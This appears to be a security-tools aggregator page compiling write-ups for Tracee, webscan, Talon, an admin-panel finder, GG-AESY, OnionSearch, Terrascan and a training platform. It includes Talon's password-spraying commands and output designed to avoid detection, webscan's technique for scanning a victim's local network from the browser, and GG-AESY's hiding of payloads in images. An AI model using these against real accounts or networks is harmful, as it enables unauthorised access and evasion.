176751.747044 1000 ls 14726 14726 -2 access pathname: /etc/ld.so.preload, mode: R_OK
176751.747077 1000 ls 14726 14726 0 security_file_open pathname: /etc/ld.so.cache, flags: O_RDONLY|O_LARGEFILE, dev: 8388610, inode: 533737
...

Each line is a single event collected by Tracee, with the following information:

  1. TIME - shows the event time relative to system boot time in seconds
  2. UID - real user id (in host user namespace) of the calling process
  3. COMM - name of the calling process
  4. PID - pid of the calling process
  5. TID - tid of the calling thread
  6. RET - value returned by the function
  7. EVENT - identifies the event (e.g. syscall name)
  8. ARGS - list of arguments given to the function

When using table-verbose output, the following information is added:

  1. UTS_NAME - uts namespace name. As there is no container id object in the kernel, and docker/k8s will usually set this to the container id, we use this field to distinguish between containers.
  2. MNT_NS - mount namespace inode number.
  3. PID_NS - pid namespace inode number. In order to know if there are different containers in the same pid namespace (e.g. in a k8s pod), it is possible to check this value
  4. PPID - parent pid of the calling process

Configuration flags
Use --help to see a full description of all options. Here are a few commonly useful flags:
  • --trace sets the trace mode; for more information see Trace Mode Configuration below
  • --event allows you to specify a specific event to trace. You can use this flag multiple times, for example --event execve --event openat.
  • --list lists the events available for tracing, which you can provide to the --event flag.
  • --output lets you control the output format, for example --output json will output JSON lines instead of a table.
  • --capture captures artifacts that were written, executed, or found suspicious, and saves them to the output directory. Possible values are: 'write'/'exec'/'mem'/'all'

Trace Mode Configuration

--trace and -t set whether to trace events from system-wide processes or from containers. They are also used to set whether to trace only new processes/containers (the default), existing processes/containers, or specific processes. Tracing specific containers is currently not possible. The possible options are:

Option | Flag(s)
Trace new processes (default) | no --trace flag, --trace p, --trace process or --trace process:new
Trace existing and new processes | --trace process:all
Trace specific PIDs | --trace process:<pid>,<pid2>,... or --trace p:<pid>,<pid2>,...
Trace new containers | --trace c, --trace container or --trace container:new
Trace existing and new containers | --trace container:all

You can also use -t, e.g. -t p:all.


Secure tracing

When Tracee reads information from user programs it is subject to a race condition: the user program might change the arguments after Tracee has read them. For example, a program invokes execve("/bin/ls", NULL, 0); Tracee picks that up and reports it; the program then changes the first argument from /bin/ls to /bin/bash, and that is what the kernel actually executes. To mitigate this, Tracee also provides "LSM" (Linux Security Module) based events, for example the bprm_check event, which can be reported by Tracee and cross-referenced with the reported regular syscall event.
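
If you log events as JSON lines (--output json), that cross-referencing can be done with a few lines of post-processing. The sketch below is ours, and the field names are assumptions based on the table output shown earlier; adapt them to the actual JSON schema:

import json
import sys

pending = {}  # pid -> pathname as reported by the execve syscall event

for line in sys.stdin:  # e.g.: tracee --output json | python3 crossref.py
    event = json.loads(line)
    pid, name = event.get("pid"), event.get("event")
    path = (event.get("args") or {}).get("pathname")
    if name == "execve":
        pending[pid] = path
    elif name == "security_bprm_check" and pid in pending:
        if pending.pop(pid) != path:
            print(f"[!] pid {pid}: syscall reported a different pathname "
                  f"than the kernel executed ({path!r})")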



Webscan - Browser-based Network Scanner And local-IP Detection



webscan is a browser-based network IP scanner and local IP detector. It detects IPs bound to the user/victim by listening on an RTP data channel via WebRTC and looping back to the port across any live IPs, as well as discovering all live IP addresses on valid subnets by monitoring for immediate timeouts (TCP RST packets returned) from fetch() calls or hidden img tags pointed to valid subnets/IPs. Works on mobile and desktop across all major browsers and OSes. The beta version is extensible to allow the addition of multiple techniques.


webscan takes advantage of the fact that non-responsive img tag sockets can be closed to prevent browser & network-based rate limiting by altering the src attribute to a non-socket URI (removing from DOM ironically does not close the socket), or by using fetch()'s signal support of the AbortController() interface.

try webscan live here
beta version here

by @SamyKamkar
released 2020/11/07
more fun projects at samy.pl

webscan works like so

  1. webscan first iterates through a list of common gateway IP addresses
  2. for each IP, it uses fetch() to make a fake HTTP connection to http://common.gateway.ip:1337
  3. if a TCP RST returns, the fetch() promise will be rejected or the img tag's onerror will trigger before a timeout, indicating a live IP
  4. to prevent browser or network rate limiting, non-responsive fetch() sockets are closed via an AbortController() signal, while img tags have their src redirected to a non-socket URI, closing the socket
  5. when a live gateway is detected, steps 1-3 are rerun for every IP on the subnet (e.g. 192.168.0.[1-255])
  6. a WebRTC data channel is opened in the browser, opening a random port on the victim machine
  7. for any IPs found alive on the subnet, a WebRTC data channel connection is made to that host
  8. if the WebRTC data channel connection succeeds, we know we just established a connection to our own local IP
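
the RST-vs-timeout trick in steps 2-3 is the heart of the scanner. here's the same liveness heuristic reproduced outside the browser as a plain Python sketch (our code, not part of webscan):

import socket

def is_live(ip, port=1337, timeout=1.0):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((ip, port))
        return True               # something actually listens on the probe port
    except ConnectionRefusedError:
        return True               # fast TCP RST: host is up, port is closed
    except (socket.timeout, OSError):
        return False              # no RST before the timeout: treat as dead
    finally:
        s.close()

# probe a couple of common gateway addresses
print([ip for ip in ("192.168.0.1", "192.168.1.1", "10.0.0.1") if is_live(ip)])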

implementation
// wait for scan to finish
let scanResults = await webScanAll()

// or get callbacks when ips are found with a promise
let ipsToScan = undefined // scans all pre-defined networks if null
let scanPromise = webScanAll(
  ipsToScan, // array. if undefined, scan major subnet gateways, then scan live subnets. supports wildcards
  {
    rtc: true, // use webrtc to detect local ips
    logger: l => console.log(l), // logger callback
    localCallback: function(ip) { console.log(`local ip callback: ${ip}`) },
    networkCallback: function(ip) { console.log(`network ip callback: ${ip}`) },
  }
)

returns

scanResults = {
  "local": ["192.168.0.109"], // local ip address
  "network": { // other hosts on the network and how fast they respond
    "192.168.0.1": 97,
    "192.168.0.2": 82,
    "192.168.0.100": 46,
    "192.168.0.109": 0,
    "192.168.0.117": 74,
    "192.168.0.113": 17,
    "192.168.0.112": 21,
    "192.168.0.114": 25,
    "192.168.0.116": 25,
    "192.168.0.115": 25,
    "192.168.0.105": 57,
    "192.168.0.107": 63,
    "192.168.0.103": 64,
    "192.168.0.108": 31
  }
}

Todo

  • use iframe to perform scans in blocks
    • when the frame is torn down, I assume this helps guarantee the connections are torn down
    • how do multiple iframes scanning multiple blocks work? perhaps this allows us to bypass browser connection rate limiting
  • support both fetch() and img as scanner cores (completed in beta)
    • Safari
      • note: img tag works really well in some browsers like Safari
      • caveat: changing the .src doesn't seem to abort the connection
      • potential solution: see iframe note above
    • Chrome
      • caveat: chrome will not abort the connection if you remove the img from dom
      • solution: chrome will abort the connection of an img if you adjust the .src, this is great!
      • caveat: changing the img.src to '#' makes another request to the same parent page
      • caveat: changing the img.src to 'about:' produces a warning in console, is there something else to use that won't make a request?
  • use img timing as a local ip detection mechanism

Tested on

  • Chrome 87.0.4280.47 (macOS)
  • Edge 86.0.622.63 (Windows)
  • Firefox 82.0.2 (macOS)
  • Firefox 82.0.2 (Windows 10)
  • Safari 13.1.2 (macOS)
  • mobile Safari (iOS)
  • mobile Chrome (iOS)



Talon - A Password Guessing Tool That Targets The Kerberos And LDAP Services Within The Windows Active Directory Environment



Talon is a tool designed to perform automated password guessing attacks while remaining undetected. Talon can enumerate a list of users to identify which users are valid, using Kerberos. Talon can also perform a password guessing attack against the Kerberos and LDAPS (LDAP Secure) services. Talon can either use a single domain controller or multiple ones to perform these attacks, randomizing each attempt between the domain controllers and services (LDAP or Kerberos).


More info about the techniques can be found on the following Blog


Usage

Download the release for your OS from the releases page


Contributing

Talon was developed in golang.

The first step, as always, is to clone the repo. Before you compile Talon you'll need to install the dependencies. To install them, run the following commands:

go get github.com/fatih/color
go get gopkg.in/jcmturner/gokrb5.v7/client
go get gopkg.in/jcmturner/gokrb5.v7/config
go get gopkg.in/jcmturner/gokrb5.v7/iana/etypeID
go get gopkg.in/ldap.v2

Then build it

go build Talon.go

Usage
$ ./Talon -h
Usage of ./Talon:
-D string
Fully qualified domain to use
-E Enumerates which users are valid
-H string
Domain controller to connect to
-Hostfile string
File containing the list of domain controllers to connect to
-K Test against Kerberos only
-L Test against LDAP only
-O string
File to append the results to
-P string
Password to use
-U string
Username to authenticate as
-Userfile string
File containing the list of usernames
-debug
Print debug statements
-sleep float
Time inbetween attempts (default 0.5)

Enumeration Mode

User enumeration mode can be executed with the -E flag, which sends only a Kerberos TGT pre-authentication request to the target KDC; however, this request is sent with a known bad or no longer supported encryption type. Talon reviews the KDC's response: KDC_ERR_ETYPE_NOSUPP indicates that the user exists, while KDC_ERR_C_PRINCIPAL_UNKNOWN indicates that it does not. Talon can perform this type of enumeration against multiple domain controllers in an enterprise using the -Hostfile flag to specify them, or against a single domain controller using -H. Using this technique will not cause any login failures, so it will not lock out any of the users. The classification logic is sketched after the example output below.

./Talon -D STARLABS.LOCAL -Hostfile DCs -Userfile Users -sleep 1 -E 

__________ ________ ___ ________ ________
|\___ _\\\ __ \|\ \ |\ __ \|\ ___ \
\|___ \ \_\ \ \|\ \ \ \ \ \ \|\ \ \ \\ \ \
\ \ \ \ \ __ \ \ \ \ \ \\\ \ \ \\ \ \
\ \ \ \ \ \ \ \ \ \____\ \ \\\ \ \ \\ \ \
\ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\
\|__| \|__|\|__|\|_______|\|_______|\|__| \|__|
(@Tyl0us)


[-] 172.16.144.195 STARLABS.LOCAL\asmith: = User Does Not Exist
[+] 172.16.144.185 STARLABS.LOCAL\ballen: = User Exist
[-] 172.16.144.186 STARLABS.LOCAL\bjohnson: = User Does Not Exist
[-] 172.16.144.195 STARLABS.LOCAL\bwayne: = User Does Not Exist
[+] 172.16.144.195 STARLABS.LOCAL\csnow: = User Exist
[-] 172.16.144.186 STARLABS.LOCAL\jtodd: = User Does Not Exist
[+] 172.16.144.186 STARLABS.LOCAL\hwells: = User Exist
[-] 172.16.144.186 STARLABS.LOCAL\wwest: = User's Account Locked
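
A minimal sketch of the classification logic mentioned above, using the Kerberos error codes from RFC 4120 (this is illustrative Python, not Talon's Go source):

KDC_ERR_C_PRINCIPAL_UNKNOWN = 6   # username not present in the realm
KDC_ERR_ETYPE_NOSUPP = 14         # pre-auth was reached, so the user exists
KDC_ERR_CLIENT_REVOKED = 18       # account locked or disabled

def classify(error_code):
    if error_code == KDC_ERR_ETYPE_NOSUPP:
        return "User Exists"
    if error_code == KDC_ERR_C_PRINCIPAL_UNKNOWN:
        return "User Does Not Exist"
    if error_code == KDC_ERR_CLIENT_REVOKED:
        return "User's Account Locked"
    return f"Unexpected KDC error {error_code}"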

Automated Password Guessing Mode

Talon utilizes Kerberos and LDAP, which are both integrated into Active Directory for authentication. Talon can perform password guessing by alternating between the two services, allowing the password-attack traffic to be split across two protocols. This splits the number of potential events generated per service, reducing the chance of an alert. Talon takes this one step further by distributing a password attack against multiple domain controllers in an enterprise using the -Hostfile flag, alternating between LDAP and Kerberos each time to create an additional layer of obscurity. A single domain controller can be provided with the -H flag if needed. A sketch of this distribution logic follows the example output below.

./Talon -D STARLABS.LOCAL -Hostfile DCs -Userfile ValidUsers -P "Not3vil" -sleep 1

__________ ________ ___ ________ ________
|\___ _\\\ __ \|\ \ |\ __ \|\ ___ \
\|___ \ \_\ \ \|\ \ \ \ \ \ \|\ \ \ \\ \ \
\ \ \ \ \ __ \ \ \ \ \ \\\ \ \ \\ \ \
\ \ \ \ \ \ \ \ \ \____\ \ \\\ \ \ \\ \ \
\ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\
\|__| \|__|\|__|\|_______|\|_______|\|__| \|__|
(@Tyl0us)


[-] 172.16.144.186 STARLABS.LOCAL\admin:Not3vil = Failed
[-] 172.16.144.185 STARLABS.LOCAL\ballen:Not3vil = Failed
[-] 172.16.144.195 STARLABS.LOCAL\cramon:Not3vil = Failed
[+] 172.16.144.185 STARLABS.LOCAL\hwells:Not3vil = Success
[-] 172.16.144.195 STARLABS.LOCAL\ssmith:Not3vil = Failed
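
The distribution logic itself is simple. Here is a hedged Python sketch of the idea (Talon is written in Go; the attempt_* helpers below are placeholders, not real authentication code):

import itertools
import random
import time

def attempt_kerberos(dc, user, password):
    return False  # placeholder for a real Kerberos AS-REQ pre-auth attempt

def attempt_ldap(dc, user, password):
    return False  # placeholder for a real LDAPS simple bind

def spray(domain_controllers, users, password, sleep=1.0):
    protocols = itertools.cycle(["kerberos", "ldap"])
    for user, proto in zip(users, protocols):   # alternate protocol per guess
        dc = random.choice(domain_controllers)  # randomize the target DC
        attempt = attempt_kerberos if proto == "kerberos" else attempt_ldap
        ok = attempt(dc, user, password)
        print(f"[{'+' if ok else '-'}] {dc} {user}:{password} ({proto})")
        time.sleep(sleep)  # mirrors the -sleep throttle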

Talon is designed to be versatile in any situation. As a result, if only Kerberos is available, Talon can be set to attack only Kerberos using the -K flag, or only LDAP using the -L flag.

Talon can use both Kerberos and LDAP to read the responses as it performs a password guessing attack. Talon can detect account lockouts during an active password guessing attack by reading the response code from each password attempt. This can help prevent any unwanted account locks across an enterprise, helping you to remain undetected. Simply follow the prompt to quit or continue the attack.

root@kali:~# ./Talon -Hostfile DCs -Userfile ValidUsers -D STARLABS.local -P "Password!" -sleep 2

__________ ________ ___ ________ ________
|\___ _\\\ __ \|\ \ |\ __ \|\ ___ \
\|___ \ \_\ \ \|\ \ \ \ \ \ \|\ \ \ \\ \ \
\ \ \ \ \ __ \ \ \ \ \ \\\ \ \ \\ \ \
\ \ \ \ \ \ \ \ \ \____\ \ \\\ \ \ \\ \ \
\ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\
\|__| \|__|\|__|\|_______|\|_______|\|__| \|__|
(@Tyl0us)


[-] 172.16.144.186 STARLABS.LOCAL\ballen:Password! = Failed
[-] 172.16.144.185 STARLABS.LOCAL\csnow:Password! = Failed
[-] 172.16.144.186 STARLABS.LOCAL\wwest:Password! = User's Account Locked
[*] Account lock out detected - Do you want to continue.[y/n]:

Troubleshooting

Talon comes equipped to detect whether the targeted domain controllers are active or have become unavailable. This helps ensure you're getting accurate results while not wasting time.

root@kali:~# ./Talon -H 172.14.15.1 -Userfile ValidUsers -D STARLABS.local -P "Frosty20" -sleep 2

__________ ________ ___ ________ ________
|\___ _\\\ __ \|\ \ |\ __ \|\ ___ \
\|___ \ \_\ \ \|\ \ \ \ \ \ \|\ \ \ \\ \ \
\ \ \ \ \ __ \ \ \ \ \ \\\ \ \ \\ \ \
\ \ \ \ \ \ \ \ \ \____\ \ \\\ \ \ \\ \ \
\ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\
\|__| \|__|\|__|\|_______|\|_______|\|__| \|__|
(@Tyl0us)


[Root cause: Networking_Error] Networking_Error: AS Exchange Error: failed sending AS_REQ to KDC: failed to communicate with KDC 172.14.15.1
[*] Do you want to continue.[y/n]:

Changelog
  • Published on 04/09/2018
  • Version 1.2 released 02/14/2019
  • Version 1.3 released 05/03/2019
  • Version 1.4 released 03/17/2020
  • Version 2.0 public release 06/18/2020


Admin-Scanner - This Tool Is Design To Find Admin Panel Of Any Website By Using Custom Wordlist Or Default Wordlist Easily



Website Admin Panel Finder

How To Install (Linux/pc)

How to Install (Termux/Android)

Usage
author: alienwhatever
credit github.com/bdblackhat for list.txt
original-source-of-list.txt - https://github.com/bdblackhat/admin-panel-finder/blob/master/link.txt

This tool is for educational and testing purposes only
I am not responsible for what you do with this tool

Usages:

-site <url of website> - Website to scan

--proxy <protocol>-<proxyserverip:port> - Scan admin panel using a proxy server

--t <second(s)> - Time delay for a thread to scan (To prevent from getting HTTP 508)

--w <path/of/custom/wordlist> - custom wordlist

Example:
./scan.py -site example.com
./scan.py -site example.com --t 1
./scan.py -site example.com example2.com
./scan.py -site example.com --w /custom/wordlist/list.txt
./scan.py --proxy http-1.2.3.4:8080 -site example.com



Fortiscan - A High Performance FortiGate SSL-VPN Vulnerability Scanning And Exploitation Tool

GG-AESY - Hide Cool Stuff In Images



Blogpost: https://redteamer.tips/introducing-gg-aesy-a-stegocryptor/

WARNING: you might need to restore NuGet packages and restart visual studio before compiling. If anyone knows how I can get rid of this problem, DM me.


Manual

To start off, I highly recommend always using GG-AESY in verbose or very verbose mode; if you are not using this in unmanaged loaders, I also recommend always specifying an outfile.

Pay attention with very verbose mode though, especially if you are hiding big payloads, as very verbose mode will print the byte array to the console.

Having said that, let's dive into the manual for this baby.

  _______   _______                    ___       _______     _______.____    ____
/ _____| / _____| / \ | ____| / |\ \ / /
| | __ | | __ ______ / ^ \ | |__ | (----` \ \/ /
| | |_ | | | |_ | |______| / /_\ \ | __| \ \ \_ _/
| |__| | | |__| | / _____ \ | |____.----) | | |
\______| \______| /__/ \__\ |_______|_______/ |__|


V1.0.0 by twitter.com/Jean_Maes_1994

Encryptor and (optional) stegano

Usage:
-h, -?, --help Show Help


-e, --encrypt-only Only encrypts given payload

-d, --decrypt decryption mode

--ps, --payload-size=VALUE
only needed if extracting payload from image for
decryption

--ef, --encrypted-file=VALUE
ENCRYPTION: The outfile for encrypted data

DECRYPTION:The inputfile needed to decrypt the
payload.




-p, --payload=VALUE The path to the payload you want to encrypt

-o, --outfile=VALUE The path to the outfile where all important data
will be written to (key,iv and encrypted
payload)

-i, --image=VALUE The image file to hide the key and/or IV in,
currently only supports JPEG (JPG) format!

--ok, --offset-key=VALUE
The offset to search for the key in image (in
decimal)

--okh, --offset-key-hex=VALUE
The offset to search for the key in image (in
hex)

--oIV, --offset-IV=VALUE
The offset to search for the IV in image (in
decimal)

--oIVh, --offset-IV-hex=VALUE
The offset to search for the IV in image (in
hex)

--op, --offset-payload=VALUE
The offset to search for the payload in image
(in decimal)

--oph, --offset-payload-hex=VALUE
The offset to search for the payload in image
(in hex)

-v, --verbose write all the good stuff to console, recommended
you actually always use this.

--vv, --very-verbose prints encrypted payload array to console
-k, --key=VALUE in case you want to use your own key value!

--IV, --initialization-vector=VALUE
in case you want to use your own IV

--rk, --random-key-mode
will hide your key in a random insertion point
in the provided image, without breaking said
image. will print the offset to console

--ra, --random-all-mode
will hide both Key and IV in a random insertion
point of the image.

--ak, --append-key-mode
will hide the key at the end of the image file

--aa, --append-all-mode
will hide the key and the IV at the end of the
image file.

--ap, --append-payload-mode
will hide the payload at the end of the image
file

--rp, --random-payload-mode
will hide the payload at a random insertion
point.

--apu, --append-payload-unencrypted
appends your payload without crypto, useful for
very quick and dirty data exfil.

-e or --encrypt-only: Will only encrypt a given payload (-p). It will write the key/IV to the console if using verbose mode, write key/IV/payload into an outfile if using the outfile (-o) flag, and finally write the bytestream to another file if using the encrypted-file (-ef) flag.

-d or --decrypt: Decryption mode. You can specify the decryption parameters using offsets (in case you have hidden the key, or key and IV, in a JPEG). Offsets are passed to the program using either the offset-key (-ok) or offset-key-hex (-okh) flags; you can use "-" as a separator or just paste in the hex without any separators, both will work fine. IVs work the same way using the -oIV and -oIVh flags.

Alternatively, you can give the IV and Key directly (in case they are not hidden in a JPEG), using the key (-k) and initialization-vectors (-IV) flags. As with the offset flags, "-" can be used as a separator, GG-AESY accepts both ASCII and byte values.

In order to decrypt, you'll also need to specify an encrypted file (-ef).
Should you have hidden a payload in a JPEG and wish to decrypt it, you'll have to specify the payload size (-ps) so GG-AESY will extract all data correctly without false positives/false negatives :).

-u or --unpack: Will unpack unencrypted appended payloads (-apu mode) from the JPEG.
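
To make the offset mechanics concrete, here is a hedged Python sketch of recovering and decrypting a payload from a carrier JPEG with pycryptodome. The CBC mode, PKCS#7 padding, and the 32/16-byte key/IV sizes are assumptions for illustration; GG-AESY itself is a .NET tool:

from Crypto.Cipher import AES  # pip install pycryptodome

def extract_and_decrypt(image_path, key_offset, iv_offset,
                        payload_offset, payload_size):
    data = open(image_path, "rb").read()
    key = data[key_offset:key_offset + 32]  # AES-256 key: 32 bytes
    iv = data[iv_offset:iv_offset + 16]     # AES block-sized IV: 16 bytes
    payload = data[payload_offset:payload_offset + payload_size]
    plain = AES.new(key, AES.MODE_CBC, iv).decrypt(payload)
    return plain[:-plain[-1]]               # strip assumed PKCS#7 padding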


Stego modes:

If no key/IV is provided, a random key/IV will be used to encrypt your data. All stego modes require you to pass GG-AESY a JPEG image (-i). If you have specified an outfile (-o) to save the important information about the crypto (such as key, IV, payload), all stego modes will also add the injection points to this file.

-rk or --random-key-mode: This Stego mode will hide your AES-256 key at a random injection point.

-ra or --random-all-mode: This Stego mode will hide both your AES-256 key and IV at a random injection point; both injection points can be the same (it's a random selection process), in which case the key and IV will be injected back to back.

-ak or --append-key-mode: This Stego mode will append the AES-256 key at the end of the JPEG.

-aa or --append-all-mode: This Stego mode will append both AES-256 key and IV at the end of the JPEG.

-ap or --append-payload-mode: This Stego mode will append the encrypted payload bytestream to the end of the JPEG.

-rp or --random-payload-mode: This Stego mode will inject the encrypted payload bytestream at a random injection point. CAUTION: This only works if your payload does not exceed 65,535 bytes, which is about 65kb, if you try a larger payload, an error will be thrown in your face. Needless to say, this mode is practically useless :)

-apu or --append-payload-unencrypted: This Stego mode will append the payload bytestream as-is to the end of the JPEG.
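
The append modes all rest on the same property of the JPEG format: viewers stop rendering at the end-of-image marker (FF D9), so anything written after it rides along invisibly. A minimal Python sketch of that idea (not GG-AESY's exact on-disk layout):

def append_to_jpeg(image_path, blob, out_path):
    data = open(image_path, "rb").read()
    # a well-formed JPEG ends with the EOI marker FF D9
    assert data.endswith(b"\xff\xd9"), "unexpected trailing bytes"
    with open(out_path, "wb") as f:
        f.write(data + blob)  # the image still renders; blob sits after EOI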

DISCLAIMER: This tool is in EARLY BETA. It's not been battle tested yet, so please submit improvements through PR's or raise issues in case of bugs. However, due to my current workload, active development on this tool from my end will not be possible at this time.
This does not mean I'm abandoning this project though :)



OnionSearch - A Script That Scrapes Urls On Different .Onion Search Engines



OnionSearch is a Python3 script that scrapes urls on different ".onion" search engines.


Prerequisite

Python 3


Currently supported Search engines

  • ahmia
  • darksearchio
  • onionland
  • notevil
  • darksearchenginer
  • phobos
  • onionsearchserver
  • torgle
  • onionsearchengine
  • tordex
  • tor66
  • tormax
  • haystack
  • multivac
  • evosearch
  • deeplink

️
Installation


With PyPI

pip3 install onionsearch


With Github
git clone https://github.com/megadose/OnionSearch.git
cd OnionSearch/
python3 setup.py install

Usage

Help:

usage: onionsearch [-h] [--proxy PROXY] [--output OUTPUT]
[--continuous_write CONTINUOUS_WRITE] [--limit LIMIT]
[--engines [ENGINES [ENGINES ...]]]
[--exclude [EXCLUDE [EXCLUDE ...]]]
[--fields [FIELDS [FIELDS ...]]]
[--field_delimiter FIELD_DELIMITER] [--mp_units MP_UNITS]
search

positional arguments:
search The search string or phrase

optional arguments:
-h, --help show this help message and exit
--proxy PROXY Set Tor proxy (default: 127.0.0.1:9050)
--output OUTPUT Output File (default: output_$SEARCH_$DATE.txt), where $SEARCH is replaced by the first chars of the search string and $DATE is replaced by the datetime
--continuous_write CONTINUOUS_WRITE
Write progressively to output file (default: False)
--limit LIMIT Set a max number of pages per engine to load
--engines [ENGINES [ENGINES ...]]
Engines to request (default: full list)
--exclude [EXCLUDE [EXCLUDE ...]]
Engines to exclude (default: none)
--fields [FIELDS [FIELDS ...]]
Fields to output to csv file (default: engine name link), available fields are shown below
--field_delimiter FIELD_DELIMITER
Delimiter for the CSV fields
--mp_units MP_UNITS Number of processing units (default: core number minus 1)

[...]

Multi-processing behaviour

By default, the script runs with mp_units = cpu_count() - 1. This means that on a machine with 4 cores, it will run 3 scraping functions in parallel. You can force mp_units to any value, but it is recommended to leave it at the default. You may want to set it to 1 to run all requests sequentially (disabling the multi-processing feature).

Please note that continuous writing to csv file has not been heavily tested with multiprocessing feature and therefore may not work as expected.

Please also note that the progress bars may not be properly displayed when mp_units is greater than 1. It does not affect the results, so don't worry.
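
For illustration, the work distribution described above boils down to something like the following Python sketch (the scrape worker is a hypothetical stand-in, not OnionSearch's real internals):

from multiprocessing import Pool, cpu_count

def scrape(job):
    engine, search = job
    return engine, []  # stand-in: would return the scraped result rows

def run(engines, search, mp_units=None):
    mp_units = mp_units or max(cpu_count() - 1, 1)  # the documented default
    jobs = [(engine, search) for engine in engines]
    if mp_units == 1:
        return [scrape(job) for job in jobs]  # fully sequential
    with Pool(mp_units) as pool:
        return pool.map(scrape, jobs)  # one engine per worker at a time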


Examples

To request all the engines for the word "computer":

onionsearch "computer"

To request all the engines excepted "Ahmia" and "Candle" for the word "computer":

onionsearch "computer" --exclude ahmia candle

To request only "Tor66", "DeepLink" and "Phobos" for the word "computer":

onionsearch "computer" --engines tor66 deeplink phobos

The same as previously but limiting to 3 the number of pages to load per engine:

onionsearch "computer" --engines tor66 deeplink phobos --limit 3

Please kindly note that the list of supported engines (and their keys) is given in the script help (-h).


Output

Default output

By default, the file is written at the end of the process. The file will be CSV formatted, containing the following columns:

"engine","name of the link","url"

Customizing the output fields

You can customize what will be flushed to the output file by using the parameters --fields and --field_delimiter.

--fields allows you to add, remove, and re-order the output fields. The default mode is shown just below. Instead, you can for instance choose to output:

"engine","name of the link","url","domain"

by setting --fields engine name link domain.

Or even, you can choose to output:

"engine","domain"

by setting --fields engine domain.

These are examples but there are many possibilities.

Finally, you can also choose to modify the CSV delimiter (comma by default), for instance: --field_delimiter ";".


Changing filename

The filename will be set by default to output_$DATE_$SEARCH.txt, where $DATE represents the current datetime and $SEARCH the first characters of the search string.

You can modify this filename by using --output when running the script, for instance:

onionsearch "computer" --output "\$DATE.csv"
onionsearch "computer" --output output.txt
onionsearch "computer" --output "\$DATE_\$SEARCH.csv"
...

(Note that it might be necessary to escape the dollar character.)

In the csv file produced, the name and url strings are sanitized as much as possible, but there might still be some problems...


Write progressively

You can choose to write to the output progressively (instead of everything at the end, which would prevent losing the results if something goes wrong). To do so, use --continuous_write True, like this:

onionsearch "computer" --continuous_write True

You can then use the tail -f (tail follow) Unix command to actively watch or monitor the results of the scraping.


Thank you to Gobarigo


Terrascan - Detect Compliance And Security Violations Across Infrastructure As Code To Mitigate Risk Before Provisioning Cloud Native Infrastructure



Detect compliance and security violations across Infrastructure as Code to mitigate risk before provisioning cloud native infrastructure.


Features
  • 500+ Policies for security best practices
  • Scanning of Terraform 12+ (HCL2)
  • Scanning of Kubernetes (JSON/YAML), Helm v3, and Kustomize v3
  • Support for AWS, Azure, GCP, Kubernetes and GitHub

Installing

Terrascan's binary for your architecture can be found on the releases page. Here's an example of how to install it:

$ curl --location https://github.com/accurics/terrascan/releases/download/v1.2.0/terrascan_1.2.0_Darwin_x86_64.tar.gz --output terrascan.tar.gz
$ tar -xvf terrascan.tar.gz
x CHANGELOG.md
x LICENSE
x README.md
x terrascan
$ install terrascan /usr/local/bin
$ terrascan

If you have go installed, Terrascan can be installed with go get

$ export GO111MODULE=on
$ go get -u github.com/accurics/terrascan/cmd/terrascan
go: downloading github.com/accurics/terrascan v1.2.0
go: found github.com/accurics/terrascan/cmd/terrascan in github.com/accurics/terrascan v1.2.0
...
$ terrascan

Install via brew

Homebrew users can install by:

$ brew install terrascan

Docker

Terrascan is also available as a Docker image and can be used as follows

$ docker run accurics/terrascan

Building Terrascan

Terrascan can be built locally. This is helpful if you want to be on the latest version or when developing Terrascan.

$ git clone git@github.com:accurics/terrascan.git
$ cd terrascan
$ make build
$ ./bin/terrascan

Getting started

To scan your code for security issues you can run the following (defaults to scanning Terraform).

$ terrascan scan

Terrascan will exit 3 if any issues are found.
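
That exit code makes it easy to gate a pipeline on the scan result. A hedged example using Python's subprocess (any CI runner that inspects return codes works the same way):

import subprocess
import sys

result = subprocess.run(["terrascan", "scan", "-o", "json"],
                        capture_output=True, text=True)
if result.returncode == 3:    # per the note above: violations were found
    print(result.stdout)
    sys.exit(1)               # fail the build
sys.exit(result.returncode)   # 0 = clean, anything else = tool error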

The following commands are available:

$ terrascan
Terrascan

An advanced IaC (Infrastructure-as-Code) file scanner written in Go.
Secure your cloud deployments at design time.
For more information, please visit https://www.accurics.com

Usage:
terrascan [command]

Available Commands:
help Help about any command
init Initialize Terrascan
scan Scan IaC (Infrastructure-as-Code) files for vulnerabilities.
server Run Terrascan as an API server

Flags:
-c, --config-path string config file path
-h, --help help for terrascan
-l, --log-level string log level (debug, info, warn, error, panic, fatal) (default "info")
-x, --log-type string log output type (console, json) (default "console")
-o, --output-type string output type (json, yaml, xml) (default "yaml")
-v, --version version for terrascan

Use "terrascan [command] --help" for more information about a command.

Documentation

To learn more about Terrascan check out the documentation at https://docs.accurics.com, where we include a getting started guide, Terrascan's architecture, a breakdown of its commands, and a deep dive into policies.


Developing Terrascan

To learn more about developing and contributing to Terrascan refer to the contributing guide.



Hacktory platform packed with new game-playing features


Without practice, theory is dead. Applied knowledge is essential in any area, especially in cybersecurity, and practice is the only way to make learning worthwhile.

There are so many courses to fit any demand. However, boring lectures, outdated textbooks, and vague, complex tasks become obstacles even for the most ambitious student.

Motivation is what pushes us towards a goal, and that's where gamification comes in. Gamification is a training methodology that helps to solve real issues and apply your knowledge immediately in practice, learn new skills, build independence, and motivate students. This tool allows the use of playful techniques in non-entertainment environments such as education or work.

One learning context for all

Cybersecurity professionals often have to think on their feet in stressful situations. Gamification, applied to immersive simulated training, has several benefits for skill development in cybersecurity. It helps employees learn to solve real-life problems while keeping them engaged, focused, and motivated. It also creates a more effective workplace. With improved interaction between co-workers, mundane tasks suddenly become competitive, which boosts overall performance. Ultimately, gamification makes employees feel happier in their roles, reduces churn, and improves productivity. 

A gamified learning process helps students understand complex topics and apply new knowledge immediately to write good-working code, find vulnerabilities, and fix them. What is equally important, the students can see their mistakes and correct them in real time. The opportunity to break into the top, solve practice assignments faster than others and set new records is an important component of the learning process, which keeps people motivated and hungry for more information and skills.

Game-based platform

Hacktory is a gamified platform for cybersecurity training that emulates real cases to teach ethical hacking techniques.

Hacktory grows and continues to evolve. Red and Blue teams did their best for prospective users and created courses in Web Security and Java Secure Programming. Premium access to the platform includes both of these courses, so your opportunities double. You can take two exams and get two certificates. 

The team has developed and improved not only the content but also the functionality to make the immersion in the cyber world more realistic.

The personal page is your claim to fame 


All necessary information concerning user activity is summarized in one place, including a list of active courses, success rates, and the number of points earned. 
